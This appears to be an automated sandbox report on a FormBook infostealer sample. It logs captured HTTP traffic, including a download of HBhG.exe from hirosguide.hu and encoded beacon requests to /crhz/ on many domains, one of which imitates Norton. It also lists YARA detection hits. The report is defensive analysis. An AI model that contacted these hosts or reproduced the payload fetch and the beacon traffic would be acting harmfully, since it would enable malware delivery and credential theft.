0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 30 Jan 2023 12:41:25 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 30 Jan 2023 12:41:28 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 30 Jan 2023 12:41:31 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:42:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:42:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:42:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:42:11 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://thepromotionhunter.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 10932Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 ed 72 e3 46 96 e5 6f eb 29 b2 e8 b0 45 da 4c 10 e0 b7 40 51 9e 2e 7f 8d 23 ba ba 1d 2e f7 4c 6c d8 8e 8a 24 70 09 a4 95 c8 c4 64 26 f8 51 6a 45 ec ab 4c 4c c4 fe db 17 d8 bf 7e 93 7d 92 bd 09 90 14 45 81 a2 4a 55 fd b1 d3 ad 2a 92 40 e6 bd e7 9c 7b ee b9 7c f1 d5 1f bf fc f1 7f 7c ff 35 49 6d 26 ae ce 2e dd 0f 11 4c 26 d3 46 6e e9 cb 1f 1a ee 0c 58 7c 75 f6 d1 65 06 96 91 28 65 da 80 9d 36 fe f4 e3 37 74 dc 20 9d dd 8d 64 19 4c 1b 0b 0e cb 5c 69 db 20 91 92 16 24 56 2e 79 6c d3 69 0c 0b 1e 01 2d 5f da 84 4b 6e 39 13 d4 44 4c c0 34 28 71 f6 60 ce b5 9a 29 6b ce 77 20 e7 19 5b 51 9e b1 04 68 ae c1 91 84 82 e9 04 ce cb 46 cb ad 80 ab ef 7f fb cf 84 4b 44 f8 ed bf 14 01 e9 5a 35 8b 19 f9 f4 e3 71 37 08 26 e4 c7 14 48 ae 55 a6 2c 57 92 a4 05 22 eb cb 4e d5 7b 76 29 b8 bc 26 1a c4 f4 3c 96 c6 91 cc c1 46 e9 39 49 f1 69 7a de e9 d8 14 76 cd 55 af 17 a9 ac e2 df f5 36 98 c0 0b c9 2c 34 88 5d e7 e8 07 cb 73 c1 23 e6 ba 3a da 98 cf 57 99 c0 2b c7 39 6d 7c 03 10 93 9c 69 56 2b 8d 7c aa d9 7f 14 6a d2 a8 24 34 52 6b 73 13 1e 13 d2 99 23 58 a7 f1 de 72 62 40 cf 33 b4 fc b7 ff d4 5c 99 0f 26 0f 3f 0e d5 ec eb 34 91 e6 b9 bd 3a 5b 72 19 ab a5 f7 66 99 43 a6 7e e5 af c1 5a 2e 13 43 a6 e4 a6 31 63 06 fe a4 45 23 dc 10 fc dc f9 b9 63 bc a5 a7 74 f2 73 a7 0c 84 f9 19 c1 35 fc dc 29 9b 7f ee 04 7d cf f7 fc 9f 3b a3 ee 6a d4 fd b9 d3 68 37 60 65 b1 df cb 65 82 2f 66 91 3c 0f 0f 1b 4b 34 fc fd ba 02 c4 27 f7 ae 0a 1d 41 23 bc 69 60 e2 d0 da b2 6d 83 5f c2 d7 3b f2 73 67 99 53 2e 23 51 c4 8e f2 57 53 1e 94 cd 14 77 07 38 b7 97 71 e9 fd 6a be 58 80 9e 0e bd c0 0b 1a b7 b7 93 b3 ce 67 2f 70 21 dc 90 39 17 40 f0 97 15 56 d1 04 24 68 24 8f c9 67 9d b3 17 f3 42 46 8e ae 09 6d d6 b6 ad 9b 05 d3 44 b6 75 5b b5 f9 94 79 91 06 ac fc 5a 80 db 48 b3 11 31 b9 60 a6 d1 6a e7 53 ee 25 60 bf 54 a8 71 65 3f fd 74 ff ad d9 e8 c6 8d d6 64 0b 4c 0c 42 6f 80 d9 f4 b5 d5 b8 30 6f 8e 53 7e 99 32 fd a5 8a a1 0d d3 66 ee 45 38 87 fe 01 22 db f4 db 7e 9b 7b 4b 1e db 14 7f 53 e0 49 6a 91 d1 c3 21 c4 8f 0e 9f 79 2e 9b eb a6 c5 d1 da d0 c2 72 bf 85 95 56 7d c5 2c fb d3 0f bf 6f b6 5a 13 0d b6 d0 92 3c 1f d7 6e 70 61 3a 9d de c3 be dd 0d 16 35 a1 1a cb 3e 74 aa 0a 2c da 60 3d a3 a3 29 3a e0 c5 30 c7 ed 58 cf ae 73 98 36 9c 53 9d 5f 19 da 59 55 b6 99 b3 70 d3 6f 5e ae 7f 64 c9 1f 58 06 cd 46 0a 0c ed fc c9 ff c5 a9 03 19 7f 99 72 11 37 2d ea 50 ba a9 a6 bf d3 9a ad 9b 8d b9 60 2e 61 55 a2 5a c8 66 8a 3c 57 da 9a e9 0d 60 28 d6 38 93 4c c2 17 7e fb ee ed eb 55 04 b9 fd 06 1b f1 fc b6 ad a7 fe 44 5f 2a 4f 80 4c 6c 3a d1 9f 7f de ba 43 f9 49 fd a4 7f f9 65 7a 17 9
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:42:14 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://thepromotionhunter.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 10932Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 ed 72 e3 46 96 e5 6f eb 29 b2 e8 b0 45 da 4c 10 e0 b7 40 51 9e 2e 7f 8d 23 ba ba 1d 2e f7 4c 6c d8 8e 8a 24 70 09 a4 95 c8 c4 64 26 f8 51 6a 45 ec ab 4c 4c c4 fe db 17 d8 bf 7e 93 7d 92 bd 09 90 14 45 81 a2 4a 55 fd b1 d3 ad 2a 92 40 e6 bd e7 9c 7b ee b9 7c f1 d5 1f bf fc f1 7f 7c ff 35 49 6d 26 ae ce 2e dd 0f 11 4c 26 d3 46 6e e9 cb 1f 1a ee 0c 58 7c 75 f6 d1 65 06 96 91 28 65 da 80 9d 36 fe f4 e3 37 74 dc 20 9d dd 8d 64 19 4c 1b 0b 0e cb 5c 69 db 20 91 92 16 24 56 2e 79 6c d3 69 0c 0b 1e 01 2d 5f da 84 4b 6e 39 13 d4 44 4c c0 34 28 71 f6 60 ce b5 9a 29 6b ce 77 20 e7 19 5b 51 9e b1 04 68 ae c1 91 84 82 e9 04 ce cb 46 cb ad 80 ab ef 7f fb cf 84 4b 44 f8 ed bf 14 01 e9 5a 35 8b 19 f9 f4 e3 71 37 08 26 e4 c7 14 48 ae 55 a6 2c 57 92 a4 05 22 eb cb 4e d5 7b 76 29 b8 bc 26 1a c4 f4 3c 96 c6 91 cc c1 46 e9 39 49 f1 69 7a de e9 d8 14 76 cd 55 af 17 a9 ac e2 df f5 36 98 c0 0b c9 2c 34 88 5d e7 e8 07 cb 73 c1 23 e6 ba 3a da 98 cf 57 99 c0 2b c7 39 6d 7c 03 10 93 9c 69 56 2b 8d 7c aa d9 7f 14 6a d2 a8 24 34 52 6b 73 13 1e 13 d2 99 23 58 a7 f1 de 72 62 40 cf 33 b4 fc b7 ff d4 5c 99 0f 26 0f 3f 0e d5 ec eb 34 91 e6 b9 bd 3a 5b 72 19 ab a5 f7 66 99 43 a6 7e e5 af c1 5a 2e 13 43 a6 e4 a6 31 63 06 fe a4 45 23 dc 10 fc dc f9 b9 63 bc a5 a7 74 f2 73 a7 0c 84 f9 19 c1 35 fc dc 29 9b 7f ee 04 7d cf f7 fc 9f 3b a3 ee 6a d4 fd b9 d3 68 37 60 65 b1 df cb 65 82 2f 66 91 3c 0f 0f 1b 4b 34 fc fd ba 02 c4 27 f7 ae 0a 1d 41 23 bc 69 60 e2 d0 da b2 6d 83 5f c2 d7 3b f2 73 67 99 53 2e 23 51 c4 8e f2 57 53 1e 94 cd 14 77 07 38 b7 97 71 e9 fd 6a be 58 80 9e 0e bd c0 0b 1a b7 b7 93 b3 ce 67 2f 70 21 dc 90 39 17 40 f0 97 15 56 d1 04 24 68 24 8f c9 67 9d b3 17 f3 42 46 8e ae 09 6d d6 b6 ad 9b 05 d3 44 b6 75 5b b5 f9 94 79 91 06 ac fc 5a 80 db 48 b3 11 31 b9 60 a6 d1 6a e7 53 ee 25 60 bf 54 a8 71 65 3f fd 74 ff ad d9 e8 c6 8d d6 64 0b 4c 0c 42 6f 80 d9 f4 b5 d5 b8 30 6f 8e 53 7e 99 32 fd a5 8a a1 0d d3 66 ee 45 38 87 fe 01 22 db f4 db 7e 9b 7b 4b 1e db 14 7f 53 e0 49 6a 91 d1 c3 21 c4 8f 0e 9f 79 2e 9b eb a6 c5 d1 da d0 c2 72 bf 85 95 56 7d c5 2c fb d3 0f bf 6f b6 5a 13 0d b6 d0 92 3c 1f d7 6e 70 61 3a 9d de c3 be dd 0d 16 35 a1 1a cb 3e 74 aa 0a 2c da 60 3d a3 a3 29 3a e0 c5 30 c7 ed 58 cf ae 73 98 36 9c 53 9d 5f 19 da 59 55 b6 99 b3 70 d3 6f 5e ae 7f 64 c9 1f 58 06 cd 46 0a 0c ed fc c9 ff c5 a9 03 19 7f 99 72 11 37 2d ea 50 ba a9 a6 bf d3 9a ad 9b 8d b9 60 2e 61 55 a2 5a c8 66 8a 3c 57 da 9a e9 0d 60 28 d6 38 93 4c c2 17 7e fb ee ed eb 55 04 b9 fd 06 1b f1 fc b6 ad a7 fe 44 5f 2a 4f 80 4c 6c 3a d1 9f 7f de ba 43 f9 49 fd a4 7f f9 65 7a 17 9
          Source: unknownHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.sandpiper-apts.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.sandpiper-apts.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sandpiper-apts.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 47 3d 47 50 76 34 42 78 75 39 6b 78 61 45 69 49 75 4b 72 4a 37 72 63 31 41 72 28 79 4c 57 33 54 36 4e 42 30 55 46 43 52 53 30 50 6e 65 57 67 77 74 78 74 63 43 62 67 35 33 30 5a 5a 62 49 4b 48 69 6a 71 5a 76 30 54 79 52 35 51 55 67 2d 77 56 71 54 50 42 50 78 59 79 49 66 6c 45 75 6e 4a 4d 64 49 72 5a 6c 78 68 31 4b 54 6d 58 46 69 5a 55 48 76 4b 6f 67 63 70 6b 55 54 28 48 71 53 52 6b 70 6b 50 4e 58 57 6c 4c 66 39 70 47 4c 6c 30 42 59 32 72 5a 69 69 41 61 39 34 66 6b 57 50 62 61 53 4b 39 78 6a 55 44 70 39 77 75 2d 41 68 71 75 68 6e 30 37 61 4f 37 64 41 2e 00 00 00 00 00 00 00 00 Data Ascii: vG=GPv4Bxu9kxaEiIuKrJ7rc1Ar(yLW3T6NB0UFCRS0PneWgwtxtcCbg530ZZbIKHijqZv0TyR5QUg-wVqTPBPxYyIflEunJMdIrZlxh1KTmXFiZUHvKogcpkUT(HqSRkpkPNXWlLf9pGLl0BY2rZiiAa94fkWPbaSK9xjUDp9wu-Ahquhn07aO7dA.
          Source: unknownDNS traffic detected: queries for: hirosguide.hu
          Source: C:\Windows\explorer.exeCode function: 10_2_0598E4F2 getaddrinfo,SleepEx,setsockopt,recv,recv,10_2_0598E4F2
          Source: global trafficHTTP traffic detected: GET /ti/HBhG.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hirosguide.huConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk&s91Fd8=b8xjX_ HTTP/1.1Host: www.laylaroseuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0&s91Fd8=b8xjX_ HTTP/1.1Host: www.sandpiper-apts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&s91Fd8=b8xjX_ HTTP/1.1Host: www.tf8dangky.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41&s91Fd8=b8xjX_ HTTP/1.1Host: www.teammart.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&s91Fd8=b8xjX_ HTTP/1.1Host: www.suachuadienlanh247.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM&s91Fd8=b8xjX_ HTTP/1.1Host: www.hvlandscapes.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&s91Fd8=b8xjX_ HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL&s91Fd8=b8xjX_ HTTP/1.1Host: www.mitsubangsaen.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=qQeRCSv6osLquMzUsT5auAtcL2kpuT7TXoM3AMsXZ7zh5sUe46PrJPqpdbUyVeYEw0ooLJaeJdeynj+iQ6oazAlglr/WxPNHjeDwf7x3jgqV&s91Fd8=b8xjX_ HTTP/1.1Host: www.hayuterce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=Tx9+97zXAbAnLmq4XNOsmb2GkF5HGNr6W72qHdNRTeliJERxp4RJ6liISWgIuo8dFog55DG7ffTMmIYpdbhnOORXqYw1ibeJvOeh5iF0aDaW&s91Fd8=b8xjX_ HTTP/1.1Host: www.wylvxing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=0GDp9E6kCyw3PTEu7mcwaVDMse4qTFHKiPIjsnORLRuzWwrUUyHW5NbJCCyvt5dATvUBD9WLW/i5ogrnJ/OA7NWjCE9u9zkY8p+SshpKLRL6&s91Fd8=b8xjX_ HTTP/1.1Host: www.popcors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=7PBSSZr71x6DL80+Go9LpHzLxq3YNNMMRlSEKhN5FSdA0XFSySCq1gq9Qp9tYYXK4CHyqoic/rLoBaFB2vw5CqcWWhDf4yMIsnGwhNAmLwJ5&s91Fd8=b8xjX_ HTTP/1.1Host: www.thepromotionhunter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?vG=u2x6Gy1HortC0OzN6Cd7rlFhxGPGvueuCm4nHgUvPGM1CfYq7BcXTxTrgZqaFf90LIlR1PLFkcg9+OygBsERh/kgPh37+bmZ6fYtcBDUzbx8&s91Fd8=b8xjX_ HTTP/1.1Host: www.nortonseecurity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 91.227.138.48:443 -> 192.168.2.6:49714 version: TLS 1.2
          Source: C:\Windows\explorer.exeCode function: 10_2_05987E22 OpenClipboard,10_2_05987E22

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
